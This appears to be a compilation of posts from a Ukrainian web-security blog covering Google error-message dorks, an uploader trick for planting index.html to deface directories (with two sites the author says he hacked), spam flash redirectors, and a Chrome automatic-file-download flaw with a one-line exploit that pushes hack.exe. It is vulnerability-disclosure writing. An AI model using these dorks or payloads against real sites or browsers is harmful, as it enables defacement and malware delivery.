Websecurity - Веб безпека

Продовжу тему “Warning” Гугл хакінга (”Warning” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.

Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information disclosure уразливості на різноманітних сайтах в Інтернеті.

Новий перелік “варнінг” пошукових запитів:

Warning: Variable passed to each

Warning: bcmod

Warning: bcompiler

Warning: cal_days_in_month

Warning: call_user_func

Warning: call_user_func_array

Warning: call_user_method

Warning: call_user_method_array

Warning: cal_to_jd

Warning: Invalid argument supplied

В своїй презентації AppSec 2007 - .NET Web Services Hacking, Shreeraj Shah розповідає про безпеку сервісів на платформі .NET. Він описує поширені атаки на сайти на даній платформі та методи захисту від них.

Основне використання аплоадера при атаці на веб сайт - це завантаження скрипту, для його виконання на сервері. У випадку, коли не можна завантажити скрипт безпосередньо, то його можна завантажити як txt-файл, і використовучи Local File Inclusion уразливість виконати необхідний код. Нещодавно я писав про уразливість в FCKeditor, що дозволяє проводити дану атаку - завантажувати код на сайт, який потім через LFI можна виконати.

Досліджуючи дану уразливість в FCKeditor я виявив, що аплоадер можна використати по іншому. Його можна використати для проведення нового виду атаки через аплоадер - завантаження html-файлу для заміни індексної сторінки (partial deface).

Дана атака може використовуватися для часткового дефейса (однієї директорії), проведення Persistent XSS та HTML Injection атак, для редирекції або розміщення шкідливого коду. І ефективність атаки буде високою, тому що URL на сайті, на який потрібно заманити жертву, не буде виглядати підозріло - це буде адреса директорії на сайті.

Суть атаки зводиться до завантаження index.html файла в діректорію для закачки. У випадку, якщо в налаштуваннях сайта не була задана інша індексна сторінка (тобто виводився список файлів даної директорії) і якщо не було заборонено закачувати index.html (або index.htm чи інші індексні файли), то даний файл виведеться по замовчуванню при заході в дану папку. Що призведе до виконання коду, що міститься в даному файлі.

Ось декілька прикладів похаканих мною сайтів (в Інтернеті можна знайти й інші взломані хакерами сайти):

http://www.labradorwest.com/contentImages/File/

http://www.pequenodavi.org.br/gerencia/docs/File/

З вищезазначеного видно, що навіть обмежений аплоадер (що дозволяє завантажувати html-файли), може бути використаний для проведення різноманітних атак на веб сайт.

Нещодавно я виявив новий вид редиректорів, які почали використовуватися спамерами - флеш редиректори.

Про редиректори, що зокрема можуть використовуватися для фішинга, я розповідав ще в 2006 році. Редиректори є поширеними уразливостями в Інтернеті. Зокрема в проекті MOSEB я розповідав про редиректори в пошукових системах, також я розповідав про редиректори на секюріті сайтах, редиректори в CMS та редиректори Гугла.

В 2007 та 2008 роках традиційні редиректори почали активно використовуватися в емайл та IM спамі. В середньому через рік бедгаї починають використовувати методи, про які повідомляли секюріті дослідники.

Окрім традиційних редиректорів, які все більш активно в останній час використовують спамери та фішери, також можна використовувати flash. Самі флешки розміщуються на різних сайтах, зокрема на безкоштовних хостінгах чи файл-хостінгах (особливо на популярних). І в яких розміщується AS код (getURL), що виконує редирекцію. Даний варіант редирекції останнім часом почав активно використовуватися спамерами.

Деякий час тому я виявив в спамі використання флеш редиректорів на сайті http://imageshack.us.

Лінка веде на файл http://img524.imageshack.us/path/file.swf. А флешка редиректить на http://spam-site. Це XSS атака через Flash, що в даному випадку використовується для редирекції.

Flash файл містить код для редирекції:

getURL("http://spam-site", "_self");

Подібні підходи призначені для заманювання на рекламуємі спамерами чи зловмисні сайти, а також для обходу спам фільтрів.

Продовжуючи розпочату традицію, після попереднього відео про Blind SQL Injection, пропоную новий відео секюріті мануал. Цього разу відео про Authentication Bypass у phpBB. Рекомендую подивитися всім хто цікавиться цією темою.

phpBB Session Handling Authentication Bypass Demonstration

В даному відео ролику наочно демонструється проведення Authentication Bypass атаки в phpBB для захоплення акаунта адміна. Що цікаво, що випуск свого MustLive Security Pack (в 2005 році) я розпочав зокрема з випуску патча для цієї дірки в phpBB. Рекомендую подивитися дане відео для розуміння векторів атаки через Insufficient Authorization та небезпеки подібних уразливостей.

This is English version of my Automatic File Download vulnerabilities in browsers article.

For already known vulnerabilities in browsers I’m adding new one. I present for you new class of vulnerabilities in browsers - Automatic File Download - it’s new attack vector, which can be used for spreading malicious software.

I had occasion to meet before with vulnerabilities, which leaded to automatic downloading of arbitrary files from Internet, particularly exe-files, and with further their execution. It was concerned with buffer overflow vulnerabilities in browsers, Internet Explorer in particular. But for the first time I saw such vulnerability, which is a part of browser’s functionality. This vulnerability was presented in browser Google Chrome. Taking into account that in all other browsers, which I worked with, I didn’t see such vulnerability, so I state that Chrome is a first browser with holed function of file downloading (when attack is going through downloading function).

Variants of attack.

From all vulnerabilities which I have found in Google Chrome, including during my project Day of bugs in Google Chrome, there were seven Automatic File Download. Altogether I disclosed eight such holes: one of nerex and seven of mine.

• Automatic File Download vulnerability via tag iframe, found by nerex - original exploit and my version of exploit.
• Automatic File Download vulnerability via tag frame - exploit.
• Automatic File Download vulnerability via tag meta - exploit.
• Automatic File Download vulnerability via tag script - exploit.
• Automatic File Download vulnerability via tag body - exploit.
• Automatic File Download vulnerability via tag form - first exploit and second.
• Automatic File Download vulnerability via tag frameset - exploit.
• Automatic File Download vulnerability via tag img - exploit.

All these vulnerabilities are triggering automatically - while downloading page with required code. I found 8 such cases in all - via tags iframe, frame, meta, script, body, form, frameset and img. It’s possible to use other tags for this attack, but they will not be triggering automatically, because will require some actions from user (press element, pointing at element, etc.). So for the attack the most suitable are these 8 variants of Automatic File Download vulnerability.

All versions of Google Chrome are vulnerable to these holes (last on current time 0.2.149.29 and previous versions of the browser).

Making of attack.

For making of attack it’s required to place code at web page and attract on it user of the browser.

Example of the code for vulnerability via tag body:

<body onload="document.location='http://websecurity.com.ua/uploads/hack.exe'">

Algorithm of attack:

1. User comes to web site, which contains this code.

2. Executable file (exe) is automatically downloading to user’s computer - into download folder, which is set in options.

After that, user in any time can go to his download folder and during check of his files, run this program. Which can be malicious one.

3. To speed up the attack, offender can stimulate victim to run this application from the browser.

For this mass download effect needs to be used. It’s needed to run for automatic downloading multiple exe-files - which will be showing at bottom of browser’s window (as a buttons). And if run simultaneously many downloadings, they will take whole place at bottom of browser’s window. Which make possibility for user to press on them.

4. User can move cursor and press on one of these buttons. He can do it by accident press button (especially when there will be many of them), from interest, or when decided that he downloaded some file by himself.

5. After pressing on it, user right away runs just downloaded program. Which can hacked his computer. On this picture my demonstration program is shown, which designed for reminding about need to attend to security.

As last picture indicates, even Google can’t protect you from me .

Conclusion.

Hidden attack (for file downloading) can be made, when user has turned off option “Ask me where to save every file”. Taking into account that this option is turned off by default, and also that even if it turned on, it can be turned off in any time (or by user, or by somebody “kind”, who will have access to user’s browser), so this vulnerability and attacks concerned with it are presenting serious danger.

From browsers which I worked with, such functionality, when it’s possible to set in settings the option “not ask where to save”, is in browser Firefox (from first 0.x versions, one of which I downloaded in 2004). And so, in all versions of Firefox before files downloading always asking, if you want to save this file (as do other browsers). And this option only affect on appearing of new dialog window, where asking where to save the file (i.e. there are two dialogs). But Chrome right away saves file without questions.

For developers of the browsers, particularly Google, it’s better to not allow such vulnerabilities in their applications.

Після виходу в березні попередньої телепередачі зі мною на Інтері, очікується нова телепередача в цьому місяці.

Сьогодні я знявся для новин для телеканалу 1+1. Які будуть показані на ТБ завтра. Сюжет з моєю участю вийде 14 вересня в 19:30 на 1+1 в програмі “ТСН” (в новинах). В сюжеті мова буде йти про атаки на сайти банків.

Так що всі бажаючі можуть завтра подивитися телепрограму з моєю участю .

P.S.

Можете переглянути дане відео в своєму плеєрі:

http://websecurity.com.ua/uploads/articles/tv_video3.flv

До відомих раніше уразливостей в браузерах додаю ще одну. Пропоную вашій увазі новий клас уразливостей в браузерах - Automatic File Download - новий вектор атаки, що може бути використаний для розповсюдження шкідливого програмного забезпечення.

Раніше мені доводилося стикатися з уразливостями, що призводили до автоматичного скачування довільних файлів з Інтернету, зокрема exe-файлів, та з подальшим їх запуском. Це було пов’язано з уразливостями переповнення буферу в браузерах, зокрема в Internet Explorer. Але вперше мені довелося побачити подібну уразливість, яка є частиною функціоналу браузеру. Дана уразливість була презентована в брузері Google Chrome. Враховучи, що в усіх інших браузерах, з якими я працював, я не бачив такої уразливості, то я заявляю, що Chrome є першими браузером з дірявою функцією скачування файлів (коли атака йде саме через функцію скачування).

Варіанти атаки.

Серед усіх уразливостей виявлених мною в Google Chrome, в тому числі в рамках мого проекту День багів в Google Chrome (Day of bugs in Google Chrome), було сім Automatic File Download. Всього таких дірок я оприлюднив вісім: одну від nerex та сім своїх.

• Automatic File Download уразливість через тег iframe, знайдену nerex - оригінальний експлоіт та моя версія експлоіта.
• Automatic File Download уразливість через тег frame - експлоіт.
• Automatic File Download уразливість через тег meta - експлоіт.
• Automatic File Download уразливість через тег script - експлоіт.
• Automatic File Download уразливість через тег body - експлоіт.
• Automatic File Download уразливість через тег form - експлоіт перший та другий.
• Automatic File Download уразливість через тег frameset - експлоіт.
• Automatic File Download уразливість через тег img - експлоіт.

Всі ці уразливості спрацьовують автоматично - при завантаженні сторінки з необхідним кодом. Таких варіантів я виявив всього 8 - через теги iframe, frame, meta, script, body, form, frameset та img. Можливе векористання інших тегів для даної атаки, але вони не будуть спрацьовувати автоматично, бо будуть вимагати деяких дій від користувача (натискання елементу, наведення на елемент та інші). Тому для атаки найбільше всього підходять саме ці 8 варіантів Automatic File Download уразливісті.

До цих дірок вразливі всі версії Google Chrome (остання на даний момент 0.2.149.29 та попередні версії браузера).

Проведення атаки.

Для проведення атаки необхідно розмістити на веб сторінці код і заманити на неї користувача браузеру.

Приклад коду для уразливості через тег body:

<body onload="document.location='http://websecurity.com.ua/uploads/hack.exe'">

Алгоритм атаки:

1. Користувач заходить на веб сайт, що містить даний код.

2. Виконуємий файл (exe) автоматично скачується на комп’ютер користувача - в папку для скачувань, що задана в налашуваннях.

Після чого, користувач в будь-який момент може зайти в свою папку для скачувань і перевіряючи свої файли, запустити дану програму. Що може виявитися шкідливою.

3. Для того, щоб пришвидшити атаку, нападник може стимулювати жертву запустити цей додаток з браузеру. Для цього потрібно використати ефект масових скачувань (mass download effect). Потрібно запустити на автоматичне скачування декілька exe-файлів - що будуть відображуватися внизу вікна браузера (у вигляді кнопок). І якщо запустити одночасно багато скачувань, вони займуть усе місце внизу вікна браузеру. Створючи можливість для користувача натиснути на них.

4. Користувач може підвести курсор і натиснути на одну з цих кнопок. Він може це зробити випадково натиснувши кнопку (особливо коли їх там буде багато), з цікавості, або вирішивши, що це він сам скачав якийсь файл.

5. Натиснувши на неї, користувач одразу запустить щойно викачану програму. Яка може похакати його комп’ютер. На даному малюнку зображена моя демонстраційна програма, яка призначена для нагадування про те, що потрібно слідкувати за безпекою.

Як видно з останнього малюнку, навіть Google не може захистити вас від мене .

Заключення.

Прихована атака (для викачання файла) може відбутися, коли у користувача відключена опція “Запитувати, де зберігати кожен файл перед завантаженням”. Враховучи, що ця опція відключена по замовчуванню, а також те, що навіть якщо вона включена, її в будь-яку мить можуть виключити (або сам користувач, або хтось “добрий”, хто дістанеться браузера користувача), то ця уразливість і пов’язані з нею атаки становлять серйозну небезпеку.

Серед браузерів з якими я працював, подібний функціонал, коли можна задати в налаштуваннях можливість “не запитувати куди зберігати”, є в браузері Firefox (ще з перших 0.x версій, одну з яких я викачав в 2004 році). Так от, в усіх версіях Firefox перед викачанням файлів завжди запитує, чи хочите ви зберігти даний файл (як це роблять й інші браузери). І ця опція впливає лише на появу нового діалогового вікна, де запитується куди зберігти файл (тобто є два діалоги). А Chrome без запитань одразу зберігає файл.

Виробникам брузерів, зокрема Гуглу, варто не допускати таких уразливостей в своїх додатках.

В Кримінальному Кодексі України існують статті щодо злочинів пов’язаних з використанням комп’ютерів. Як ІТ-фахівцю та програмісту з великим стажем, мені ця тема була цікава і я слідкував за появою даних статей в новій редакції Кримінального Кодекса (в 2001 році). Щоб знати зміст цих статей і враховувати їх в своїй діяльності (щоб діяти в рамках законодавства).

Це ще було задовго до того, як я почав займатися напрямков веб безпеки на початку 2005 року. І з того часу дана тема стала для мене ще більш актуальною.

В себе на сайті багато років тому я розмістив тексти статей про комп’ютерні злочини:

• Кримінальний кодекс - статті щодо ЕOМ - оригінальні статті від 2001 року.
• Кримінальний кодекс - доповнення - доповнення до даних статей.

На офіційному сайті Кримінального Кодексу ви можете ознайомитися з діючою редакцію кодексу. Зокрема ознайомитися з Розділом XVI - Злочини у сфері використання електронно-обчислювальних машин (комп’ютерів), систем та комп’ютерних мереж і мереж електрозв’язку.

Усім професіоналам ІТ-галузі, програмістам та взагалі всім користувачам комп’ютерів, що мешкають в Україні, варто бути ознайомленими з даними статтями КК України.

В своїй презентації Security Management Practices, Ben Rothke розповідає про сучасні практики управління безпекою. Він торкається різних аспектів процесу управління безпекою.